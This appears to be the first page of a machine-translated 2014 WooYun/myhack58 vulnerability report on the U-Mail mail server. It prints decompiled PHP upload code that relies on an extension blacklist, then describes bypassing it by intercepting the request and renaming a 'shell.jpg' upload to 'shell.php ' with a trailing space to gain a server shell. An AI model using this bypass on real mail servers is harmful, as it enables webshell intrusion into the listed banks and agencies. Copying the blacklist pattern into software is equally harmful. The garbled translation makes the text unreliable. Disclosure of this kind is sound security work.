U-Mail Mail Service system arbitrary file upload+execution vulnerabilities runtime defects and authentication bypass)-bug warning-the black bar safety net

ID MYHACK58:62201453337
Type myhack58
Reporter 路人甲@乌云
Modified 2014-09-07T00:00:00


Brief description:

PRODUCT DESCRIPTION(taken from website) U-Mail focus on email field 1 to 5 years, for enterprises to easily build the most secure and stable e-mail system software. Keywords: 1 5 years the safest most stable {1 5 year the safest and most stable} , (w)(o)(x)(*)(a)(o)(l)(e),so wonderful code, so wonderful design, so wonderful configuration, so wonderful, Super very easily, using a normal cannot the normal functions you can get to the shell of the system, I had to... Related to: Finance, government, banking, oil, military, security industry and other important sectors, the impact is very large, the test affected by the rate: 99.8%~1 0 0% OTC: I want to put the Agricultural Bank down,think about or forget,after all, just change the card in digital,into a tyrant, so be extremely unsafe..

Detailed description:

1 Product Description

U-Mail mail server, for enterprises to easily build the most secure and stable e-mail system software. U-Mail focus on email field 1 to 5 years, the majority of enterprises and institutions of the Mailbox server software stable and secure of all kinds of needs, and e-mail applications management of diversified and personalized for the target to do the in-depth development, to maximize expand the enterprise mailbox system of functional flexibility and stability, so that it becomes the government, universities, schools, enterprises group and engaged in the sale of enterprise email software, network service providers, integrators the most desirable of the Post Office system the erection of the software. Support for digital certificate services and to provide powerful management capabilities, can be directly in the WebMail compose or read digitally signed or digitally encrypted secure mail(S/MIME). Provide military levels of security Strength(4 0 9 6-bit DH/DSS encryption or 2 0 4 8-bit RSA encryption); and The use of TLS/SSL standard Secure Sockets Layer communication Protocol(1 0 2 4 bit RSA encryption), support, including SSL SMTP, SSL POP3, SSL IMAP4, secure communication services, preventing network listening, making communication more secure.

2 U-Mail customer case

The Chinese Ministry of Foreign Affairs Agricultural Bank of China Fuzhou city people's Congress Standing Committee Nanning International Airport Shanghai Telecom company Jiuquan satellite launch center The State Environmental Protection Administration Shanghai Pudong Development Bank Hohhot branch Sichuan provincial intellectual property office Jinzhong commercial banks China Express Airlines State test satellite center Guangyuan expensive Commercial Bank National Security Technology Research Institute People's Republic of China Xiamen Maritime safety administration Weihai City Commercial Bank ... There are many, many more not listed...

3 start to talk about real upload vulnerability, say weird configuration issue

Vulnerability file /client/mail/module/o_attach.php The code is as follows, The code is Zend encrypted, but it..)

if ( ACTION == "attach-upload" ) { if ( $_FILES ) { $file_name = $_FILES['Filedata']['name']; $file_type = $_FILES['Filedata']['type']; $file_size = $_FILES['Filedata']['size']; $file_source = $_FILES['Filedata']['tmp_name']; $file_suffix = getfilenamesuffix( $file_name ); $not_allow_ext = array( "php", "phps", "php3", "exe", "bat" ); if ( in_array( $file_suffix, $not_allow_ext ) ) { dump_json( array( "status" => 0, "message" => el( "does not support the extension of the file to upload", "" ) ) ); } $path_target = getusercachepath( ); do { $file_id = makerandomname( ); $file_target = $path_target.$ file_id.".".$ file_suffix; } while ( file_exists( $file_target ) ); if ( move_uploaded_file( $file_source, $file_target ) ) { dump_json( array( "status" => 0, "message" => el( "write file error, please contact the administrator!", "" ) ) ); } $_SESSION[SESSION_ID]['attach_cache'][] = array( "id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size ); dump_json( array( "status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id ) ); } else { dump_json( array( "status" => "0", "message" => el( "unable to locate file to be uploaded!", "" ) ) ); } }

Here, then, is mainly to you for some time for the vulnerability to repair imperfect, can be bypassed, the result can again upload any file, get the Server Permissions.. First look at the How do you repair the

$not_allow_ext = array( "php", "phps", "php3", "exe", "bat" ); if ( in_array( $file_suffix, $not_allow_ext ) ) { dump_json( array( "status" => 0, "message" => el( "does not support the extension of the file uploaded", "" ) ) ); }

This is typical of the blacklist limit., the blacklist is too do not fly, and thus can be easily bypassed.. Here is not to give specific proof, the file upload can refer to the previous this vulnerability

Tick: U-Mail arbitrary file upload vulnerability a gold

But since the official has already fixed this vulnerability, of course, the use of the above method is unable to successfully upload, you want to slightly change the Construct a form to upload when using Burp capture, modify the uploaded file name as follows

Content-Disposition: form-data; name="Filedata"; filename="shell.jpg" modify Content-Disposition: form-data; name="Filedata"; filename="shell.php" note: the shell. php back space

[1] [2] [3] next